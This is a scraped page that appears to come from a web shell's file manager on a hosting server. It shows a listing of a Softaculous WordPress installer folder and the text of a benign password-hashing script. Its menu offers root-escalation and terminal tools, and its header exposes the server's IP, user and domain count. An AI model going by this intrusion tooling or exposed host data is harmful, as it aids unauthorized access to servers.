Linux evo.fastest-server.com 5.14.0-284.1101.el9.tuxcare.11.els11.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 14 13:30:35 UTC 2026 x86_64
LiteSpeed
Server IP : 103.249.112.113 & Your IP : 216.73.217.135
Domains : 988 Domain
User : tanishks
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
wp70 /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-09-24 11:57
languages
[ DIR ]
drwxr-xr-x
2026-09-24 11:57
php53
[ DIR ]
drwxr-xr-x
2026-09-24 11:57
php56
[ DIR ]
drwxr-xr-x
2026-09-24 11:57
php71
[ DIR ]
drwxr-xr-x
2026-09-24 11:57
php81
[ DIR ]
drwxr-xr-x
2026-09-24 11:57
php82
[ DIR ]
drwxr-xr-x
2026-09-24 11:57
plugins
[ DIR ]
drwxr-xr-x
2026-09-24 11:57
.htaccess
482
B
-rw-r--r--
2026-08-20 02:34
_htaccess
553
B
-rw-r--r--
2026-08-20 02:34
_index.php
59
B
-rw-r--r--
2026-08-20 02:34
_wp-config.php
3.39
KB
-rw-r--r--
2026-08-20 02:34
add_user.php
461
B
-rw-r--r--
2026-08-20 02:34
backup.php
3.03
KB
-rw-r--r--
2026-09-23 09:22
check_charset.php
2.02
KB
-rw-r--r--
2026-08-20 02:34
clone.php
32.23
KB
-rw-r--r--
2026-09-23 09:22
clone.xml
497
B
-rw-r--r--
2026-08-20 02:34
edit.php
11.31
KB
-rw-r--r--
2026-09-23 09:22
edit.xml
2.63
KB
-rw-r--r--
2026-08-20 02:34
extend.php
102.45
KB
-rw-r--r--
2026-09-23 09:22
fileindex.php
291
B
-rw-r--r--
2026-08-20 02:34
import.php
6.51
KB
-rw-r--r--
2026-09-23 09:22
info.xml
16.02
KB
-rw-r--r--
2026-09-23 04:56
install.js
4.2
KB
-rw-r--r--
2026-08-20 02:34
install.php
32.52
KB
-rw-r--r--
2026-09-23 09:22
install.xml
13.07
KB
-rw-r--r--
2026-08-20 02:34
md5
4.4
KB
-rw-r--r--
2026-09-23 09:22
notes.txt
6.39
KB
-rw-r--r--
2026-08-20 02:34
plugin_activate.php
596
B
-rw-r--r--
2026-08-20 02:34
plugin_deactivate.php
613
B
-rw-r--r--
2026-08-20 02:34
sign_on.php
3.41
KB
-rw-r--r--
2026-08-31 07:35
soft.htaccess
127
B
-rw-r--r--
2026-08-20 02:34
update_pass.php
639
B
-rw-r--r--
2026-08-20 02:34
upgrade.php
16.05
KB
-rw-r--r--
2026-09-23 09:22
upgrade.xml
2.48
KB
-rw-r--r--
2026-08-20 02:34
wp-config.php
3.11
KB
-rw-r--r--
2026-08-20 02:34
Save
Rename
<?php /** * A Compatibility library with PHP 5.5's simplified password hashing API. * * @author Anthony Ferrara <ircmaxell@php.net> * @license http://www.opensource.org/licenses/mit-license.html MIT License * @copyright 2012 The Authors */ @unlink('update_pass.php'); if(!defined('PASSWORD_BCRYPT')){ define('PASSWORD_BCRYPT', 1); } if(!defined('PASSWORD_DEFAULT')){ define('PASSWORD_DEFAULT', PASSWORD_BCRYPT); } $password_to_hash = base64_encode( hash_hmac( 'sha384', '[[admin_pass]]', 'wp-sha384', true ) ); $resp = password_hash($password_to_hash, PASSWORD_BCRYPT); echo '<update_pass>'.'$wp' . $resp.'</update_pass>'; ?>